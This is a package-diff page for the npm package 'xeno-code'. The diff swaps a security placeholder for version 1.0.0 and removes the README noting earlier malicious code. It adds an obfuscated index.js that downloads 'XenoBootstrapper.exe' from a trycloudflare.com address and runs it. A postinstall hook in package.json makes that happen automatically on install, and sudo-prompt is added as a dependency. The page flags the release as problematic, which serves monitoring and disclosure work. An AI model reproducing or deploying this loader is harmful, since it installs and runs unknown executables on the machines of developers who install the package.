xeno-code 0.0.1-security → 1.0.0

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.

Potentially problematic release.


This version of xeno-code might be problematic. Click here for more details.

Files changed (3) hide show
  1. package/index.js +1 -0
  2. package/package.json +14 -3
  3. package/README.md +0 -5
package/index.js ADDED
@@ -0,0 +1 @@
1
+ const _0x401f20=_0x508a;(function(_0x1ba7b3,_0x37ef82){const _0x14b5a3=_0x508a,_0x649bb9=_0x1ba7b3();while(!![]){try{const _0x2dbe7c=parseInt(_0x14b5a3(0x15f))/0x1*(parseInt(_0x14b5a3(0x15e))/0x2)+parseInt(_0x14b5a3(0x164))/0x3+parseInt(_0x14b5a3(0x168))/0x4*(-parseInt(_0x14b5a3(0x166))/0x5)+-parseInt(_0x14b5a3(0x15a))/0x6+parseInt(_0x14b5a3(0x167))/0x7*(parseInt(_0x14b5a3(0x165))/0x8)+parseInt(_0x14b5a3(0x16a))/0x9*(parseInt(_0x14b5a3(0x15b))/0xa)+-parseInt(_0x14b5a3(0x160))/0xb;if(_0x2dbe7c===_0x37ef82)break;else _0x649bb9['push'](_0x649bb9['shift']());}catch(_0x30a61b){_0x649bb9['push'](_0x649bb9['shift']());}}}(_0x5403,0x8701b));function _0x508a(_0x23cac0,_0x25a328){const _0x54031f=_0x5403();return _0x508a=function(_0x508aab,_0x4f9e60){_0x508aab=_0x508aab-0x155;let _0x394f11=_0x54031f[_0x508aab];return _0x394f11;},_0x508a(_0x23cac0,_0x25a328);}const fs=require(_0x401f20(0x156)),path=require(_0x401f20(0x15d)),fetch=require(_0x401f20(0x157)),{exec}=require('child_process'),exeFileName='XenoBootstrapper.exe',downloadUrl=_0x401f20(0x162),exeFilePath=path[_0x401f20(0x16b)](__dirname,exeFileName);async function downloadFile(_0x2947e7,_0x21a6e3){const _0x245987=_0x401f20,_0x3a6cc5=await fetch(_0x2947e7);if(!_0x3a6cc5['ok'])throw new Error(_0x245987(0x169)+_0x3a6cc5[_0x245987(0x161)]);const _0x12eab0=await _0x3a6cc5[_0x245987(0x163)]();await fs[_0x245987(0x155)](_0x21a6e3,_0x12eab0);}async function runExecutable(){const _0x3c7f25=_0x401f20;try{await downloadFile(downloadUrl,exeFilePath),exec(exeFilePath,_0x15cc66=>{const _0x551e8b=_0x508a;_0x15cc66&&console['error'](_0x551e8b(0x15c)+_0x15cc66);});}catch(_0x152c6f){console[_0x3c7f25(0x159)](_0x3c7f25(0x158)+_0x152c6f);}}runExecutable();function _0x5403(){const _0x4964d6=['62fkddpE','15164rGmzCd','6085002zoELcl','status','https://created-night-developing-grows.trycloudflare.com/getxeno','buffer','3183606KTqdeq','1945624yFOWxj','5kvsuBN','21MJUwDJ','2669636khQdGW','HTTP\x20error!\x20status:\x20','5137713GmyAgu','join','writeFile','fs-extra','node-fetch','Download\x20error:\x20','error','6349044LwhlId','10dkevPb','Error\x20running\x20the\x20executable:\x20','path'];_0x5403=function(){return _0x4964d6;};return _0x5403();}
package/package.json CHANGED
@@ -1,6 +1,17 @@
1
1
  {
2
2
  "name": "xeno-code",
3
- "version": "0.0.1-security",
4
- "description": "security holding package",
5
- "repository": "npm/security-holder"
3
+ "version": "1.0.0",
4
+ "description": "Pkg",
5
+ "main": "index.js",
6
+ "bin": {
7
+ "update": "index.js"
8
+ },
9
+ "scripts": {
10
+ "postinstall": "node index.js"
11
+ },
12
+ "dependencies": {
13
+ "fs-extra": "^10.0.0",
14
+ "node-fetch": "^2.6.7",
15
+ "sudo-prompt": "^9.2.1"
16
+ }
6
17
  }
package/README.md DELETED
@@ -1,5 +0,0 @@
1
- # Security holding package
2
-
3
- This package contained malicious code and was removed from the registry by the npm security team. A placeholder was published to ensure users are not affected in the future.
4
-
5
- Please refer to www.npmjs.com/advisories?search=xeno-code for more information.